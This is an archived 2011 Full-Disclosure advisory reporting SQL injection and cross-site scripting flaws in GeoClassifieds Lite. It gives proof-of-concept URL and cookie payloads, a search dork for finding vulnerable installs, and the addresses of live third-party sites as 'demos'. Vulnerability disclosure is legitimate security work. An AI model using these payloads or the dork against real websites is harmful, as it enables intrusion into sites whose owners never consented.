lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 5 Sep 2011 20:09:22 +0000
From: Yassin Aboukir <01xp01@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: GeoClassifieds Lite Multiple vulnerabilities

---------------------------------------------------------------------
[+] Title            : GeoClassifieds Lite Multiple vulnerabilities
[+] Affected Version : v2.0.1 & V2.0.3.1 & V2.0.3.2 &V2.0.4
[+] Software Link    : http://geodesicsolutions.com/
[+] Tested on        : Windows 7 <Firefox>
[+] Date             : 25/08/2011
[+] Dork             : "inurl:/admin/ Classifieds and Auctions
Software by Geodesic Solutions"
[+] Category         : Webapps
[+] Severity         : High to Medium
[+] Author           : Yassin Aboukir <01Xp01|At|Gmail.com>
[+] Site             : http://www.Yaboukir.Com
----------------------------------------------------------------------

[+] About the Software: [ Purchased Price: $399 USD - $799 USD] Geo
Classifieds Premier gives you all the options of the Basic classifieds
software edition, plus additional flexibility and powerful
functionality. It allows you to create multiple user groups and
multiple pricing plans, and is built to suit the most complicated
E-Commerce needs.

[+] How That can be Exploited :

### V2.0.1 : Suffer from SQL Injection and Cross site scripting (Xss)
vulnerability.

1- SQL Injection (High) :

    http://Localhost/?a=19&c=id [SQL Attack]

2- Cookies Based SQL Injection (High) :

# Read More About The Attack :
http://www.Yaboukir.com/cookie-based-sql-injection/

The idea of the PoC is to Intercept the HTTP request sent to the
vulnerable Website using a Web Proxy (WebScarab for example or just
Tamper Data Firefox Add-on) then and modify The Cookie variable
language_id .

GET  HTTP/1.1
Host: localhost.com
Connection: keep-alive
Cookie: language_id=1[SQL attack]

3- Cross Site Scripting (Medium) :

The same thing with the Xss Vulnerability, all you have is to modify
the HTTP request .

GET  HTTP/1.1
Host: localhost.com
Connection: keep-alive
Cookie: </div><script>alert('Xssed-By-Yassin');</script>

Demos:
http://classified4u.biz/
http://www.freeclassifieds.aapkakolkata.com/


### V2.0.3.1 & V2.0.3.2 & V2.0.4 : Suffer from Cross site scripting (Xss).

1- Cross Site Scripting (Medium) :

http://Localhost/index.php?a=19&c=</div><script>alert('Xssed By
Yassin');</script>
http://Localhost/?a=19&c="+onmouseover=alert('Xssed-By-Yassin')+

Demos:
http://www.tescal.com/ads/
http://www.216ads.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ